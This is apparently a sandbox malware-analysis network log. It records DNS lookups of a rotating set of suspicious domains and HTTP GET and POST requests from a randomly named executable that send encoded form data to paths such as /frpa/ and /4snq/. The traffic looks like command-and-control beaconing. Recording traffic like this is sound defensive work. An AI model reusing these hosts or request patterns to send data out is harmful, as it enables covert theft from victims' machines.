                                                                            Nov 5, 2024 15:24:56.545696974 CET5574880192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:57.386984110 CET5574880192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:57.392195940 CET805574813.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:24:58.405266047 CET5574980192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:58.410365105 CET805574913.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:24:58.410505056 CET5574980192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:58.420857906 CET5574980192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:58.425734997 CET805574913.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:24:59.099910021 CET805574913.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:24:59.100061893 CET5574980192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:59.933726072 CET5574980192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:24:59.938705921 CET805574913.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.953788996 CET5575080192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:00.958924055 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.959186077 CET5575080192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:00.973829985 CET5575080192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:00.982199907 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982258081 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982347965 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982357979 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982369900 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982378006 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982453108 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982462883 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:00.982470036 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:01.620423079 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:01.620534897 CET5575080192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:02.481129885 CET5575080192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:02.486036062 CET805575013.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:03.499699116 CET5575180192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:03.504760981 CET805575113.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:03.505903006 CET5575180192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:03.513168097 CET5575180192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:03.518178940 CET805575113.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:04.165735006 CET805575113.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:04.197984934 CET805575113.248.169.48192.168.2.4
                                                                            Nov 5, 2024 15:25:04.198110104 CET5575180192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:04.199194908 CET5575180192.168.2.413.248.169.48
                                                                            Nov 5, 2024 15:25:04.204318047 CET805575113.248.169.48192.168.2.4

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 5, 2024 15:22:49.659286022 CET5352810162.159.36.2192.168.2.4
                                                                            Nov 5, 2024 15:22:50.322916031 CET53623701.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:22:55.096348047 CET5993953192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:22:55.423834085 CET53599391.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:23:11.655572891 CET6053953192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:23:11.667706966 CET53605391.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:23:19.734139919 CET5595253192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:23:19.782898903 CET53559521.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:23:33.202723026 CET5753753192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:23:33.573404074 CET53575371.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:23:46.999455929 CET6152953192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:23:47.526007891 CET53615291.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:24:01.233614922 CET6180653192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:24:01.248641968 CET53618061.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:24:14.551685095 CET5007453192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:24:14.652101994 CET53500741.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:24:28.374813080 CET6084653192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:24:28.442543030 CET53608461.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:24:41.814724922 CET6329553192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:24:41.872518063 CET53632951.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:24:55.830491066 CET6142253192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:24:55.847809076 CET53614221.1.1.1192.168.2.4
                                                                            Nov 5, 2024 15:25:09.624695063 CET5053353192.168.2.41.1.1.1
                                                                            Nov 5, 2024 15:25:09.664222002 CET53505331.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 5, 2024 15:22:55.096348047 CET192.168.2.41.1.1.10xaca7Standard query (0)www.wcm50.topA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:11.655572891 CET192.168.2.41.1.1.10x68faStandard query (0)www.everycreation.shopA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:19.734139919 CET192.168.2.41.1.1.10xd6e3Standard query (0)www.onemart.siteA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:33.202723026 CET192.168.2.41.1.1.10x504Standard query (0)www.lanxuanz.techA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:46.999455929 CET192.168.2.41.1.1.10x4b3Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:01.233614922 CET192.168.2.41.1.1.10xf14cStandard query (0)www.teerra.shopA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:14.551685095 CET192.168.2.41.1.1.10xebd5Standard query (0)www.dverkom.storeA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:28.374813080 CET192.168.2.41.1.1.10xbb14Standard query (0)www.dalong.siteA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:41.814724922 CET192.168.2.41.1.1.10x9c0cStandard query (0)www.030002304.xyzA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:55.830491066 CET192.168.2.41.1.1.10x8909Standard query (0)www.polarmuseum.infoA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:25:09.624695063 CET192.168.2.41.1.1.10x47a4Standard query (0)www.growdigitally.netA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 5, 2024 15:22:55.423834085 CET1.1.1.1192.168.2.40xaca7No error (0)www.wcm50.topwcm50.topCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:22:55.423834085 CET1.1.1.1192.168.2.40xaca7No error (0)wcm50.top154.23.184.60A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:11.667706966 CET1.1.1.1192.168.2.40x68faName error (3)www.everycreation.shopnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:19.782898903 CET1.1.1.1192.168.2.40xd6e3No error (0)www.onemart.site209.74.95.29A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:33.573404074 CET1.1.1.1192.168.2.40x504No error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:33.573404074 CET1.1.1.1192.168.2.40x504No error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:47.526007891 CET1.1.1.1192.168.2.40x4b3No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:23:47.526007891 CET1.1.1.1192.168.2.40x4b3No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:01.248641968 CET1.1.1.1192.168.2.40xf14cNo error (0)www.teerra.shopteerra.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:01.248641968 CET1.1.1.1192.168.2.40xf14cNo error (0)teerra.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:01.248641968 CET1.1.1.1192.168.2.40xf14cNo error (0)teerra.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:14.652101994 CET1.1.1.1192.168.2.40xebd5No error (0)www.dverkom.store31.31.196.17A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:28.442543030 CET1.1.1.1192.168.2.40xbb14No error (0)www.dalong.sitedalong.siteCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:28.442543030 CET1.1.1.1192.168.2.40xbb14No error (0)dalong.site172.96.187.60A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:41.872518063 CET1.1.1.1192.168.2.40x9c0cNo error (0)www.030002304.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:55.847809076 CET1.1.1.1192.168.2.40x8909No error (0)www.polarmuseum.info13.248.169.48A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:24:55.847809076 CET1.1.1.1192.168.2.40x8909No error (0)www.polarmuseum.info76.223.54.146A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:25:09.664222002 CET1.1.1.1192.168.2.40x47a4No error (0)www.growdigitally.nettarget.flexifunnels.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 5, 2024 15:25:09.664222002 CET1.1.1.1192.168.2.40x47a4No error (0)target.flexifunnels.com104.16.6.253A (IP address)IN (0x0001)false
                                                                            Nov 5, 2024 15:25:09.664222002 CET1.1.1.1192.168.2.40x47a4No error (0)target.flexifunnels.com104.16.7.253A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.wcm50.top
                                                                            • www.onemart.site
                                                                            • www.lanxuanz.tech
                                                                            • www.komart.shop
                                                                            • www.teerra.shop
                                                                            • www.dverkom.store
                                                                            • www.dalong.site
                                                                            • www.030002304.xyz
                                                                            • www.polarmuseum.info

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.455454154.23.184.60804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:22:55.444257021 CET534OUTGET /4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.wcm50.top
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:22:56.420778036 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:22:56 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a62026-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.455564209.74.95.29804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:19.800028086 CET796OUTPOST /frpa/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.onemart.site
                                                                            Origin: http://www.onemart.site
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.onemart.site/frpa/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 64 6b 57 6e 49 46 35 6b 61 48 70 5a 4d 50 71 79 4f 36 52 37 55 4b 46 53 4d 37 2f 64 47 2f 6b 6f 42 6d 69 70 4f 55 52 64 61 36 66 54 6e 39 6d 51 7a 4f 44 2f 54 62 55 38 38 79 70 58 76 38 55 6b 50 6c 54 5a 66 35 2b 44 59 76 6b 39 6c 39 50 43 6e 64 66 41 52 57 39 58 33 38 75 37 4b 79 79 4e 74 69 69 73 64 47 7a 64 4c 46 75 70 2b 74 73 66 56 70 78 47 67 4c 62 6f 64 51 54 42 41 41 30 2f 4a 44 2f 49 30 6b 34 4d 61 61 64 56 56 57 71 58 64 71 6d 4e 32 51 75 78 45 4a 39 4f 30 35 34 53 50 70 32 77 31 4f 78 54 74 4e 4a 41 65 51 64 2b 2f 71 66 58 74 67 3d 3d
                                                                            Data Ascii: zhl=76ifAss/opDqdkWnIF5kaHpZMPqyO6R7UKFSM7/dG/koBmipOURda6fTn9mQzOD/TbU88ypXv8UkPlTZf5+DYvk9l9PCndfARW9X38u7KyyNtiisdGzdLFup+tsfVpxGgLbodQTBAA0/JD/I0k4MaadVVWqXdqmN2QuxEJ9O054SPp2w1OxTtNJAeQd+/qfXtg==
                                                                            Nov 5, 2024 15:23:20.484478951 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 05 Nov 2024 14:23:20 GMT
                                                                            Server: Apache
                                                                            Content-Length: 13928
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                            Nov 5, 2024 15:23:20.484637976 CET1236INData Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65
                                                                            Data Ascii: " rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body> <div cl
                                                                            Nov 5, 2024 15:23:20.484649897 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61
                                                                            Data Ascii: </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button>
                                                                            Nov 5, 2024 15:23:20.485023022 CET1236INData Raw: 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 61 63 74 69 76 65 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 3e 50 61 67 65 73 3c 2f 61 3e 0d 0a 20 20 20
                                                                            Data Ascii: " class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial<
                                                                            Nov 5, 2024 15:23:20.485035896 CET1236INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 61 67 65 73 3c 2f 61 3e 3c 2f
                                                                            Data Ascii: > <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">404 Error</li> </ol>
                                                                            Nov 5, 2024 15:23:20.485045910 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 31 22 3e 50 72 6f 70 65 72 74 79 20 54 79 70 65 20 31 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <option value="1">Property Type 1</option> <option value="2">Property Type 2</option> <option value="3">Property Type 3</option>
                                                                            Nov 5, 2024 15:23:20.485805988 CET1236INData Raw: 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63
                                                                            Data Ascii: <div class="container text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i>
                                                                            Nov 5, 2024 15:23:20.485819101 CET36INData Raw: 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 68 6f 6e 65 2d 61 6c 74 20 6d 65 2d 33 22 3e 3c 2f 69
                                                                            Data Ascii: ><i class="fa fa-phone-alt me-3"></i
                                                                            Nov 5, 2024 15:23:20.485833883 CET1236INData Raw: 3e 2b 30 31 32 20 33 34 35 20 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c
                                                                            Data Ascii: >+012 345 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" hr
                                                                            Nov 5, 2024 15:23:20.485846043 CET1236INData Raw: 66 3d 22 22 3e 54 65 72 6d 73 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63
                                                                            Data Ascii: f="">Terms & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
                                                                            Nov 5, 2024 15:23:20.489850998 CET1236INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64
                                                                            Data Ascii: <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> </div> </div>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.455578209.74.95.29804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:22.345351934 CET816OUTPOST /frpa/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.onemart.site
                                                                            Origin: http://www.onemart.site
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.onemart.site/frpa/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 62 30 6d 6e 4f 6c 46 6b 63 6e 70 59 41 76 71 79 48 61 52 2f 55 4b 4a 53 4d 35 53 47 47 4e 41 6f 41 48 53 70 50 58 4a 64 5a 36 66 54 7a 74 6d 56 74 2b 44 67 54 62 59 30 38 7a 56 58 76 34 38 6b 50 6c 6a 5a 59 49 2b 41 5a 2f 6b 6f 6a 39 50 41 6a 64 66 41 52 57 39 58 33 38 4b 43 4b 79 71 4e 74 54 53 73 53 45 58 63 47 6c 75 75 35 74 73 66 45 35 77 42 67 4c 62 42 64 52 50 72 41 44 4d 2f 4a 47 62 49 30 78 45 4e 41 4b 64 54 52 57 72 6a 51 62 62 33 30 77 37 51 4f 36 4a 6f 72 39 49 65 44 50 6e 71 6b 2f 51 45 2f 4e 74 7a 44 58 55 4b 79 70 69 65 32 6f 41 4d 72 63 5a 33 2b 67 6f 77 57 65 39 4c 6a 37 4c 2b 77 62 73 3d
                                                                            Data Ascii: zhl=76ifAss/opDqb0mnOlFkcnpYAvqyHaR/UKJSM5SGGNAoAHSpPXJdZ6fTztmVt+DgTbY08zVXv48kPljZYI+AZ/koj9PAjdfARW9X38KCKyqNtTSsSEXcGluu5tsfE5wBgLbBdRPrADM/JGbI0xENAKdTRWrjQbb30w7QO6Jor9IeDPnqk/QE/NtzDXUKypie2oAMrcZ3+gowWe9Lj7L+wbs=
                                                                            Nov 5, 2024 15:23:23.026525021 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 05 Nov 2024 14:23:22 GMT
                                                                            Server: Apache
                                                                            Content-Length: 13928
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
